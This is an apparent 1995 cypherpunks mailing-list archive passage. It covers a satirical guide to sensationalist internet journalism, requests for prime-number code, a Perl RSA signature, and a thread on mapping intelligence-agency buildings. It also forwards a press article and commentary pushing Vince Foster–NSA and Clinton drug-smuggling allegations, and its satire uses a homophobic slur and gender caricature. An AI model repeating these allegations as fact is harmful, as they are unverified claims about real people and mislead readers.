  You also know that sex itself doesn't sell, but stories about "comsumers" of
  sexual material do.  This also provides you with an excuse to show pictures
  of naked women (purely to document what's available, of course) and yet still
  hold the moral high ground.
 
  The Internet, like all communications networks, was designed solely to
  communicate pornographic images.  Of course, the average user has absolutely
  no idea how to do this, or how to perform the complex decoding and image
  manipulation necessary to view these images.  As a reporter, it is your duty
  to inform the public on how this is done.  Our moral guardians will be
  appalled at how easily you can get access to the information, anyone with a
  computer will be busy trying to duplicate your feat, and everyone else will
  be too busy staring at the pictures to do anything else.
 
  Make porn the main theme of your story.  If you're doing a story on the
  Usenet, pick something with the name "sex" in it (even if it's a sexual abuse
  counselling service - if it has "sex" in the name it's got to be bad), and
  concentrate exclusively on that.  Ignore the fact that there are over 11,000
  other interest areas available on the Usenet.  Don't even waste your time
  with them - all people ever talk about there is books, films, art, hobbies,
  cars, health, politics, financial issues, current events, religion,
  literature, and so on.  Who on earth would read a story about that?
  Concentrate only on the stuff which pulls in the readers/viewers.
  Concentrate on porn.
 
- - HIGH TECH
 
  Virtually any journalist will know that the majority of the population are
  somewhat technophobic.  If you want to hold the readers attention, you can't
  go wrong when you use this fact to your advantage.  Let's take a simple
  example:
 
    An American, a Japanese, and a New Zealander have a new technology
    explained to them.  The American says "Great, we can use this to hold the
    evil Commies in check.  I wonder if we can use it as a special effect in
    the latest Schwarzenegger film?".  The Japanese says "Interesting.  We can
    make a killing from this.  I wonder how we can make it smaller and easier
    to use".  The New Zealander says "Appalling.  This will destroy
    civilization.  How can we ban it?".
 
  As a journalist, all you need to do is follow this basic premise - that all
  new technology is evil and dangerous - and you just can't go wrong.  To
  support your claims, pick a group of self-proclaimed experts and consult them
  frequently.  The right educational counsellors ("Only natural wooden toys
  will stop your child becoming an axe murderer"), the right psychologists
  ("The constant contact with technology leads to an inner loneliness.
  Therefore the current generations lack of communications skills is solely due
  to the invention of the telephone"), and law enforcement people ("We have no
  idea who did it, or why, or how, or when, but we do know that they got the
  information off the Internet").  Remember that *you* don't actually need to
  understand what it is you're reporting, because most of your audience won't
  either.  As long as they buy the paper or watch the program, you'll know
  you've done your job.
 
  The most important point, however, is that, due to the thorough work of your
  colleagues, the reader/viewer already has certain expectations for any story
  about the net.  Whenever they hear the word "Internet", they immediately know
  what the coverage will be on: the dangers of computers, porn, pedophiles, and
  bomb recipes.  Even if they remember nothing else, the viewers will know that
  porn was involved.  Whenever any story about the internet is published or
  broadcast, the viewers wil automatically expect it to be about porn, which
  makes your job so much easier.
 
 
HOW TO DO A REPORT ON THE NET, ARRANGED BY TARGET AUDIENCE
 
Journalists are like fishermen, they select the appropriate bait depending on
the intended prey.  Although the usual collection of porn, pedophiles, and
other paraphernalia without which no report on the net can be complete provide
a wide foundation for virtually any kind of story you care to dream up, you can
give your report that final polish by specifically targeting a particular
group.  For example:
 
If you're writing for a right-wing audience:
 
  Your readers/viewers will dislike the net anyway - just look at the people
  using it, these long-haired hippie wierdos, dole bludgers and students,
  should all go out and get a real job or something.  You don't really need to
  cover this area too deeply.  The best way to get your audience hooked is to
  tell them about the horrible perversions they can run into on the net.  Just
  think, the person you're exchanging mail with could actually be a *screaming
  bender*, and you wouldn't even know about it!  There are actually areas of
  the net where gay people can meet, and talk.  Your audience *must* be
  informed of this dangerous technology.  Your message is therefore:
 
    The Internet is a piece of high-technology whose single goal is to allow
    perverted gays and lesbians to get to your children.
 
  Once your readers realise that it's possible for gays and lesbians to use the
  net just like everyone else, and that they can talk about virtually anything
  (my God, I mean, *anything*) then you know your article has been a success.
 
 
If you're writing for a left-wing audience:
 
  As with a right-wing audience, you have an advantage here that your left-wing
  readers/viewers will be suspicious of the net because the government is
  involved with it.  The internet is simply a bridgehead for a nationwide
  police database, identity cards, and the spectre of Big Brother.  Although it
  can be hard to introduce the usual morals panic into a story on general
  technophobia, we're sure you can do it.  Your general message is therefore:
 
    The Internet is a piece of high-technology whose single goal is to allow
    the government to set up a Big Brother-like nationwide computerised
    monitoring system
 
 
If you're writing for a radical feminist audience:
 
  This, along with the nations moral guardians, is your ideal target audience.
  The internet is run mostly by men and in the past has been used mostly by
  men.  The mere existence of the evil internet is therefore solely the fault
  of all males.  Your message is therefore:
 
    The Internet is a piece of high-technology whose single goal is to allow
    the emotionally crippled male gender to communicate pictures of their
    female victims and therefore increase the incidence of sexual abuse and
    rape.
 
  Remember that certain ideologies of the radical feminist movement have to be
  brought up in each story.  These are:
 
  - The goal of all male-dominated technology is the oppression of womyn.  All
    technology, even if it's not obvious how, is created to oppress womyn.
  - Pornography is the theory, rape is the practice.  Any man who sees even a
    glimpse of bare flesh is instantly converted into a rapist.
  - Womyn never look at any porn, not even at pictures of naked men, and never
    produce porn for other women to consume.  Every counterexample to this
    claim is either invented or the product of male brainwashing.
 
  Try and find a number of womyn to support your views.  Interview lots of
  sexual abuse victims, even if there's no connection whatsoever to the
  Internet, because graphic abuse stories are a great way to arouse sympathy
  for your cause, as has been ably demonstrated in US Senate hearings.  If you
  ever even show a man as part of your story, find some pimply, greasy-haired,
  low-IQ type whose most intelligent comment is a Beavis-and-Butthead-like "Huh
  huh huh".
 
 
If you're writing for the "moral majority":
 
  This is the perfect target audience.  Your viewers/readers will be
  conservative, right-wing, and won't understand the technological and social
  issues involved.  Tell them anything.  Since you control the media, noone
  will ever correct you (except perhaps a few long-haired hippies calling
  talkback shows, but who listens to talkback anyway?).  If a 15-year-old runs
  away from home, they've been kidnapped by an internet pedophile ring.  Every
  time you turn on your computer, snuff movies appear on the screen.  A shadowy
  gang of spies is hiding US nuclear weapons secrets inside dirty pictures and
  sending them to the middle east.  There are more pedophiles on the net in the
  US than the population of some countries.  The middle east has an appalling
  pedophiles-on-the-net problem, even though there is no Internet in the middle
  east.  All these stories, and more, have already been run by your colleagues
  in and outside the country, or have been reported by politicians.  If people
  will swallow this, they'll swallow anything.  Although you have a pretty much
  blank slate on which to vent your creativity, extensive research has shown
  that you get the best results if you make your message more or less:
 
    The Internet is a piece of high-technology whose single goal is to allow
    every imaginable form of depravity and filth into every home in New
    Zealand.
 
 
WARNINGS
 
As with any story, there are a few traps you have to be careful to avoid.
 
- - Never let the reader know what else is available on the net.  You make your
  living from the fact that you feed information to people.  If these people
  find out that they can get the same information faster, easier, and much more
  cheaply, off the net, you'll lose your monopoly, and, sooner or later, your
  job.  By manipulating your reader's emotions (shock, disbelief, loathing),
  you can make sure that few people will ever see the full richness of the
  information available on the net, and ensure that they keep coming to you for
  information.
 
- - Never mention the fact that virtually everybody who is anybody is on the net.
  If people find out that things like Time Magazine, MTV, the New York Stock
  Exchange, and Winona Ryder are all directly accessible via the net, their
  image of the internet will be shattered.
 
- - Never mention the fact that there are no commercials and no censorship on the
  net.  Your sponsors are hard at work turning peoples TV watching and
  newspaper reading into an almost coninuous stream of commercials.  If people
  found out that they can sit on the internet for 15 hours at a time without
  seeing a single ad for womens sanitary products, your TV station (and
  therefore your job) is in trouble.
 
 
IRRELEVANT TOPICS
 
There are certain topics you should never touch on in your reporting.  These
are:
 
- - Technology.  Noone cares about this.  Your audience doesn't want to know
  about the technology, otherwise they'd have to actually think about the
  issues involved.  And anyway, when did you become an engineer or sociologist?
  The best reports on the internet are filed by reporters who refuse to even
  use a computer and have no idea what the internet is, since they're the ones
  least likely to be hampered by any facts.
 
- - Education.  Never mention the fact that studies have shown that
  children who use the internet spend less time in front of the TV, do better
  at school, have better writing skills, and are much more likely to get a job
  in the future.  Scare them away from the internet.  We've got a welfare
  state, they'll be looked after in some way.  Besides, you'll be able to do
  more stories on future street kids that way.
 
- - Useful applications of the internet.  If you find out that the President of
  the United States is on the internet, don't even think about suggesting the
  Prime Minister does the same.  Politics and computers just don't mix, as has
  been shown repeatedly by one ex-National Party politician.  Even if the
  President talks to his staff via email, and they all run around with laptops,
  that's just an American fad.  New Zealanders don't need that sort of thing.
 
- - Other media.  Always call it "the Internet", whether what you're reporting on
  occurred on the internet, a private network, a standalone computer, or in
  your imagination.  If necessary, edit the pictures you show to support your
  story.  When people hear a computer horror story, they expect it to be about
  the internet, not based on something you saw last night on X-Files.
 
 
FOR YOUR SAFETY
 
As a reporter, you've become accustomed to having your say while everyone else
listens.  On the internet, this is very different.  When one of your
masterpieces of creative reporting is published or broadcast, a potential
audience of thirty million people will pick it to pieces.  With a single story,
you can alienate fifty, a hundred thousand members of your audience in one
stroke.  Never use the internet yourself, or publish any form of email address.
You're not paid to handle feedback, only to write stories.  Heavens, if you
listened to people correcting your story, you might actually have to report the
truth!
 
Therefore, write whatever you want, but never give your readers a chance to
reply.  By the time NZ Post has finally delivered their mail to you, you'll
already be halfway through your next report on baby-eating pedophiles on the
net, and can safely ignore any feedback from the previous one.
 
 
A LAST PLEA TO JOURNALISTS
 
Horror stories about the internet have already helped hundreds of your
colleagues through dry spells in the flow of news.  Make sure you preserve this
valuable resource for future generations of journalists.  Don't report more
than you need to.  A short, zero-content missive in which you mention the word
"pedophiles" in every second sentence is fine, as has been ably demonstrated by
Trevor Rogers.  The internet is a wonderful source of stories for any
journalist or reporter who has a deadline in a few hours and nothing else they
can report on.  You can report virtually anything without needing to do any
research or acquire any background information.  Therefore the *real* purpose
of the internet can finally be revealed:
 
    The Internet is a piece of high-technology whose single goal is to allow
    reporters, at the expense of the truth, to grab the headlines for a day or
    two with an absolutely minimal investment in time and effort.
 
We hope to have made your job as a reporter easier through this simple guide.
Good luck, and remember, as long as you use the magic words "pedophile",
"porn", and "protecting the children" as often as possible, you can get away
with anything.
 
                                    --------
 
Written 15/6/95 Peter Gutmann, from an original by Scot Stevenson.


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman@CS.YALE.EDU>
Date: Tue, 8 Aug 95 09:07:44 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Prime Number Gen's.
Message-ID: <Pine.SUN.3.91.950808120640.17355D-100000@frog.zoo2.cs.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know of where I could get source, royalty free, in the US for 
a good Prime Number Generator?

One that used a set of quick probabalistic algorithms would be cool.

Thanks
Ben.
____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant,
and kindness from the unkind; yet, strange, I am ungrateful to those 
teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net       http://www.netresponse.com/zldf  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 8 Aug 95 12:24:32 PDT
To: cypherpunks@toad.com
Subject: *hot* Foster news
Message-ID: <199508081922.MAA20209@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



various "conspiracy theories" have been circulating connecting
Foster to the NSA, although there doesn't seem to be any 
substantial, verifiable connections-- UNTIL NOW. below
the amazing british reporter Evans-Pritchard, who has 
broken much of the Foster information, states that 
Deborah Gorham, Foster's executive assistant, gave 
testimony that  he was handling NSA documents near
the time of death!!! (Evans-Pritchard was quoted a few
weeks ago of being "skeptical" of the more extreme
Foster-NSA theories, although he has pointed out the
many inconsistencies associated with the Foster
"suicide"...)

this Foster thing continues to gain steam.. apparently
Newt Gingrich has hired an independent investigator...

frankly, I think we are seeing the beginning of the
end of the Clinton administration... or perhaps even
the Presidency as we know it...

BTW, a hot Foster URL with all the extreme theories/releases
 is

http://www.cris.com/~dwheeler/n/whitewater/whitewater-index.html

the most amazing stuff on this page claims some publishers
were attempted to be *bribed* in not releasing Foster info/stories..


------- Forwarded Message

Date: Mon, 07 Aug 95 03:04:34 0600
Subject: Ambrose throws scat in the oscillator

http://www.telegraph.co.uk/et/access?ac=111146825878&pg=//95/8/7/wambro0
7.html


Secret service link in death of Clinton aide

By Ambrose Evans-Pritchard in Washington

VINCE Foster was handling top-secret intelligence files at the White 
House before his violent death
in July 1993, according to sworn testimony given to the Senate Banking 
Committee.

Deborah Gorham, Foster's executive assistant, gave a dramatic new twist 
to the widening
Whitewater investigation into the financial affairs of Hillary and Bill 
Clinton. Gorham told Senate
lawyers that Foster, Deputy White House Counsel and an intimate friend 
of the Clintons, stored
documents from the National Security Agency in a safe next door in the 
office of his boss. 

The Telegraph has obtained a full copy of Gorham's deposition, which was 
taken behind closed
doors on June 26 and never been released to the press.

She testified that Foster handed her the files for safe storage in March 
or April of 1993. Asked
what the documents looked like, she replied: "There were two one-inch 
ring binders that were from
the National Security Agency."

She referred to the NSA files with precision three times in her 
testimony. The Senate investigators,
however, did not seem interested in this surprising disclosure and moved 
on quickly to other
matters. When Gorham appeared as a witness in televised hearings last 
Tuesday, the subject never
came up.

The National Security Agency is a legendary arm of US intelligence. It 
is controlled by the Defence
Department and has a far larger budget than the CIA. Its chief function 
is to collect intelligence
from satellites and by eavesdropping on telephones and computer traffic 
all over the world.

Foster's job as Deputy White House Counsel was to handle legal matters 
concerning the institution
of the presidency. While his office might handle classified documents 
from the FBI or other law
enforcement agencies from time to time, it would be highly unusual for 
him to get mixed up in the
foreign espionage activities of the ultra-secret NSA.

Gorman said that these two files were the only ones Foster ever handed 
to her for storage in the
safe. She also testified, however, that Foster kept a file on the Waco 
disaster locked in a cabinet in
his office, which may belie White House claims that Foster never played 
a significant role in the
storming of the Branch Davidian stronghold by the FBI.

There is no proof that Foster ever had any dealings with the NSA

There is no proof that Foster ever had any dealings with the NSA, or any 
other branch of US
intelligence. But allegations have been flying on the Internet computer 
superhighway and in
political newsletters on both the Left and the Right over the past few 
weeks claiming that he was an
NSA operative during the 1980s. It is alleged that he took care of legal 
matters for a computer
company in Arkansas that installed "bugged" software on behalf of US 
intelligence in commercial
and central banks all over the world.

At the time, Foster was head of litigation at the Rose Law Firm in 
Little Rock, Arkansas. It has
never been established that he did, in fact, do work for this computer 
company. But his partner,
Hillary Rodham Clinton, was the attorney of record on two known 
occasions, once in 1978 and
then again in April 1986 (during the term of Bill Clinton's 
Governorship) when a federal court
clerk inadvertently revealed her role in a case by releasing details of 
a sealed law suit.

The staff of the Independent Counsel investigating Whitewater has been 
asking some questions
about this subterranean software nexus after receiving a letter from 
Elliot Richardson, the former
US Attorney-General. Richardson, who has followed the affair closely, 
has suggested that it might
be linked in some way to the death of Foster. Jim Leach, the Chairman of 
the House Banking
Committee, has also been looking into the computer mysteries in 
preparation for his own
congressional hearings into Whitewater, this week.

In a parallel development, The Telegraph has learned that the House 
Judiciary Committee is
beginning to prepare for possible hearings into gun-running and 
drug-smuggling in Arkansas.
Terry Reed, a former Air Force intelligence operative, has been asked if 
he is willing to testify
about his experiences in a covert operation based at the Mena airport in 
the mid-1980s.

I want to know whether they're for real this time, or whether it's just 
another of
their political pillow fights"

After watching the charade of Republican hearings into Waco and 
Whitewater over the past three
weeks, Reed has mixed feelings about this prospect. "I want to know 
whether they're for real this
time, or whether it's just another of their political pillow fights," he 
said.

He is the plaintiff in a civil-rights suit that is cracking open the 
great Arkansas scandal quite
effectively through the power of legal "discovery". Last month, he took 
sworn testimony from a
secretary at the Criminal Intelligence Division of the Arkansas State 
Police who said that she helped
shred sensitive documents revealing the involvement of Bill Clinton's 
Arkansas in the Contra
support operation run by Lt Col Oliver North.

In another deposition, L. D. Brown, the Arkansas State Trooper, has now 
repeated under oath the
allegations published in the August edition of the American Spectator 
magazine. He said he was
recruited by the CIA in 1984 - with the encouragement of Governor 
Clinton - and flew on two
missions to Central America to deliver M-16 rifles to the Nicaraguan 
Contras.

On one of the return trips, he discovered the aircraft was carrying 
cocaine into Arkansas. He
confronted Clinton, but was told not to worry. "That's Lasater's deal," 
said the Governor,
referring to Dan Lasater, a business tycoon and political supporter who 
was later convicted on
federal cocaine charges.

Over dinner at the Cosmos Club in Washington last week, Trooper Brown 
said that his old friend
Bill Clinton was complicit in a major drug-smuggling operation. That, he 
said, is something that
cannot be forgiven.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 8 Aug 95 12:32:30 PDT
To: cypherpunks@toad.com
Subject: Slouka's "War of the Worlds" (trashing of computers)
Message-ID: <ac4d08ee08021004d983@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:53 PM 8/8/95, John Young wrote:
>   8-8-95. NYPaper:
>
>
>   "War of the Worlds: Cyberspace and the High-Tech Assault on
>   Reality." [Book review]
>
>      Ominous signs already exist, says the scholar Mark
>      Slouka that virtual reality has begun to replace real
>      life -- or "R.L.," as it is dismissively referred to by
>      computer freaks. Even those poor benighted folks who
>      have yet to enter the computer age appear to have
>      started down "the road to unreality," says Mr. Slouka:
>      PONA's (or "persons of no account," as they're known on

[rest elided]

I found this book several days ago in a local bookstore and sat down on the
floor to read (most of) it. It's one of those thin, 130-page-or-so books,
about the length of what many of us can write in a few days. (I'm not
claiming our stuff is as publishable, just that the publishing industry
seems to love being able to charge $25 for a hardback book of 30,000 words!
The imminent death of conventional publishing predicted!)

Yet more bashing of computers. I found nothing insightful in this book,
just a personal account of the author's struggle to understand why so many
of his friends are using computers so much.

Bashing the cybernetic aspects of our culture is hot these days. I expect
Oprah and Sally Jesse to soon be doing shows on this. Children whose
mothers are Net addicts, brothers who kill their sisters for using "vi,"
and jilted cyberlovers who are in relationships with their shrinkwraps.

--Tim May


Special note: My ISP has changed its domain name from "sensemedia.net" to
"got.net" (as in "got milk?"), so I have to again ask you all to bear with
me and use my new e-mail address, "tcmay@got.net".
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Tue, 8 Aug 95 10:35:49 PDT
To: "Rev. Ben" <samman@cs.yale.edu>
Subject: Re: Prime Number Gen's.
In-Reply-To: <Pine.SUN.3.91.950808120640.17355D-100000@frog.zoo2.cs.yale.edu>
Message-ID: <199508081735.NAA27772@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



"Rev. Ben" writes:
> Does anyone know of where I could get source, royalty free, in the US for 
> a good Prime Number Generator?

PGP?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 8 Aug 95 10:55:49 PDT
To: cypherpunks@toad.com
Subject: Re: proving programs correct
In-Reply-To: <199508081248.IAA11447@panix2.panix.com>
Message-ID: <9508081749.AA20619@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>A boss of mine at Bellcore, and a very smart guy (B. Gopinath) once
>mentioned to me that (with the exception of scheme) he'd never seen a
>set of formal semantics for a language that were smaller than the
>largest program one would care to write in the language.


I suggest he look at occam, the semantics are very compact, about ten pages.

The purpose of writing the denotational semantics is to obtain a grounding for 
the axiomatic semantics which may then be used for proofs.

All this means is that languages such as ADA are useless for formal methods work 
because the language is too big to develop a usefull semantics for it. C is 
better but still far too large and the semantic ambiguities of the language 
cause problems.

I don't consider the conventional application of formal methods to be a 
practical approach. This does not mean that no such approaches exist, merely 
that people use the wrong ones.


		Phill H-B



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Tue, 8 Aug 95 11:29:43 PDT
To: cypherpunks@toad.com
Subject: alt.politics.org.cia
Message-ID: <9508081825.AA11385@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


I picked up a posting there which I forwarded to another list (skipping this
slightly overloaded one :-) but it was cute/funny -- suggesting a project
for finding unmarked spook buildings in your neighborhood and gathering
a database (on the web?) of such.

It's not a CP topic, but it's related and folks might want to check out
that newsgroup.  (Thanks to r$ for the inspiration.)

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 8 Aug 95 11:53:52 PDT
To: cypherpunks@toad.com
Subject: PTM_kin
Message-ID: <199508081853.OAA17131@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-8-95. NYPaper:


   "War of the Worlds: Cyberspace and the High-Tech Assault on
   Reality." [Book review]

      Ominous signs already exist, says the scholar Mark
      Slouka that virtual reality has begun to replace real
      life -- or "R.L.," as it is dismissively referred to by
      computer freaks. Even those poor benighted folks who
      have yet to enter the computer age appear to have
      started down "the road to unreality," says Mr. Slouka:
      PONA's (or "persons of no account," as they're known on
      line) can be found in front of their television sets,
      watching fictionalized accounts of real-life events, or
      at ballgames, listening to radio broadcasts of the very
      game being played before their eyes. As Mr. Slouka puts
      it, more and more of us "accept the copy as the
      original," a development that is sure to accelerate in
      coming years with lasting social, cultural and political
      effects. Mr. Slouka foresees a sinister new world in
      which telecommunications replaces physial contact and
      meaningless abstractions replace a sense of community
      and place: a solipsistic world turned in on itself and
      easily subject to manipulation by politicians.


   PTM_kin


   [Mark Slouka, John Perry Barlow, Kevin Kelly and Sven
   Birkerts beavis-butt and wayne-garth about cyber-duh in the
   August Harper's.]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 8 Aug 95 15:51:30 PDT
To: cypherpunks@toad.com
Subject: Judge Ito says NSA won't help!
Message-ID: <ac4d39270e0210042df7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



While watching the coverage of the OJ circus, I just heard Judge Ito say
about a tape that has been recorded over a couple of times:

"I doubt that it's recoverable, except by the NSA, and I doubt they're
going to help us."

I saw the lawyers smile, so they caught the reference.

Anybody who thinks the NSA remains obscure isn't watching enough t.v.!

--Tim May

Special note: My ISP has changed its domain name from "sensemedia.net" to
"got.net" (as in "got milk?"), so I have to again ask you all to bear with
me and use my new e-mail address, "tcmay@got.net".
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 8 Aug 95 10:12:08 PDT
To: samman@cs.yale.edu ("Rev. Ben")
Subject: Prime Number Gen's.
Message-ID: <15295.9508081711@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



"Rev. Ben" <samman@cs.yale.edu> writes on cpunks:
> Does anyone know of where I could get source, royalty free, in the US for 
> a good Prime Number Generator?

GNU code sounds like it would fit the royalty free bill.

Try the GNU multi-precision library: gmp-1.3.2.tar.gz from all good
GNU sources.  I get my stuff from ftp://src.doc.ic.ac.uk/gnu/ if you
don't have a GNU ftp site to hand.

There's a function

	int mpz_probab_prime_p(mpnum, SURETY)

which returns true if the prime passes SURETY probablistic prime tests.

I think if it passes say 25 tests, then there will be less than a
1/2^25 chance that it is not prime.

Also, on:

	http://dcs.ex.ac.uk/~aba/rsa-keygen.html

I've got some code Aggelos Keromitis <kermit@forthnet.gr> wrote using
the GNU mp library for generating RSA keys, it uses the probab_prime
function, like this:

        while (!mpz_probab_prime_p(&p, 25))     /* Find a prime */
          mpz_add_ui(&p, &p, 1);

Where p is a random starting point.  Ie just add one and repeat.  It
would be faster to check for some more obvious things like even nos,
etc.  But it seems to work well enough, and generates working RSA
keys.

Adam
--
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
--rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
-------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 8 Aug 95 17:23:00 PDT
To: cypherpunks@toad.com
Subject: QAK_qak
Message-ID: <199508090022.UAA00675@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-8-95. NYPaper (for paleo-galactic quackers):


   "New Survey of Sky Finds Most Quasars Are Equally Ancient:
   The strange objects may be an early stage of galaxy
   formation."

      The discovery of new evidence for the epoch of quasar
      proliferation was one of the important results of a
      10-year survey of quasars conducted by astronomers using
      the 200-inch Hale Telescope at Palomar Observatory in
      southern California. The findings were reported in the
      July issue of The Astronomical Journal by Dr. Maarten
      Schmidt of the California Institute of Technology, Dr.
      Donald P. Schneider of Pennsylvania State University and
      Dr. James E. Gunn of Princeton University. Other
      astronomers praised the research and noted that it
      generally confirmed the results of a complementary
      survey of the southern sky by a team led by Dr. Patrick
      Osmer, an astronomer at Ohio State University. Those
      observations, reported last year, were conducted at
      telescopes in Australia and Chile.


   QAK_qak






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kari Laine" <buster@klaine.pp.fi>
Date: Tue, 8 Aug 95 10:38:00 PDT
To: cypherpunks@toad.com
Subject: Re: hardware encryption
Message-ID: <199508081737.AA17967@personal.eunet.fi>
MIME-Version: 1.0
Content-Type: text/plain



> I'm looking for add-in cards that implement DES and/or RSA
> for either a PC (ISA/EISA/whatever) or a Sun (S-Bus),
> preferably a Sun. Also, the RSA card would need to implement
> a 1024 bit modulus.

uti-maco Belgium has some cards in that category:

Contact information:

uti-maco Belgium N.V.
De Vunt 9
B-3220 Holsbeek - Belgium

Phone +32-16-44 01 35
Fax +32-16-44 01 40
Compuserve: 100272,2772 (internet format: 100272.2772@compuserve.com)


Best Regards
Kari

Kari Laine          buster@klaine.pp.fi
LAN Vision Oy       Tel. +358-0-502 1947
Sinikalliontie 14   Fax  +358-0-524 149
02630 ESPOO         BBS  +358-0-502 1576/1456
FINLAND




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Tue, 8 Aug 95 18:05:42 PDT
To: cypherpunks@toad.com
Subject: RE: alt.politics.org.cia
Message-ID: <75175.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In message Tue, 8 Aug 95 14:25:20 EDT, Carl Ellison <cme@TIS.COM>  writes:
> project for finding unmarked spook buildings in your neighborhood and
> gathering a database (on the web?) of such.
> It's not a CP topic, but it's related and folks might want to check out
> that newsgroup.  (Thanks to r$ for the inspiration.)

It is definitly a stretch. But a web listing is probably the right idea.
I've already got some public spook information on my subpages, I think
I'll start collecting locations. I'll let someone else do the CGI map.

Nearly everyone knows that CIA has major offices in Roslyn VA. And
most are clued in to the Georgetown (a section of Washington DC)
"garbage garage" that was a CIA front (now it is a tony mall). There are
also CIA offices in Vienna VA, altho I have to admit I don't know exactly
where.  To find CIA offices, all you have to do is follow the blue busses.

DIA is marked, about a mile from the Pentagon.

But this raises a question (please, not to start a f-war)
as to what is a "spook"?  For example, the Secret Service has an unmarked
facility on 22 or 23rd street in NW Washington. They keep the Pres' limo,
etc there. Clearly from a standpoint of their clumsey raids (Pentagon City
2600, etc.) they classify as spooks.

Are contractors such as Mitre, E-Systems, and TRW, who do mega-dollars
of work each year considered spooks? I think some are, as they are
effectively out-sourced civil servants.

I guess I could simply walk into the Soviet Embassy and ask them
where the US spooks are. It isn't a secret from anyone but uninformed
citizens.

There is at least one Federal Building in each state, holding VA,
Dept of Ag, etc. Nearly all have FBI and other LEA offices.

Is there an ethical question buried here? Making it easy for another nut to
kill mere working stiffs by posting the locations?

Disclaimer:  I'm kinda split on this, I've been on this list a long time,
but my dad, wife, and brother work or worked in town for the government.
I hope that Tim's revolution is quite and peaceful.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Levy" <AXEL@CONTED.Lan.McGill.CA>
Date: Tue, 8 Aug 95 19:26:11 PDT
To: cypherpunks@toad.com
Subject: www directory
Message-ID: <199508090222.WAA07725@sifon.CC.McGill.CA>
MIME-Version: 1.0
Content-Type: text/plain


is there a www directory?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul Foley" <paul@gec.co.nz>
Date: Tue, 8 Aug 95 05:41:25 PDT
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: Re: RSA/Perl Shirts
Message-ID: <30273101.gec@gec.co.nz>
MIME-Version: 1.0
Content-Type: text


One thing I have to ask: Does wearing one of these shirts under
something else count as carrying a concealed weapon? :-)
-- 
Paul Foley                  <paul@gec.co.nz>           PGP key 0x0D1C0E75
-----------------There's no government like no government----------------
Where they burn books, in the end they will also burn people.
                                                        -- Heinrich Heine



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
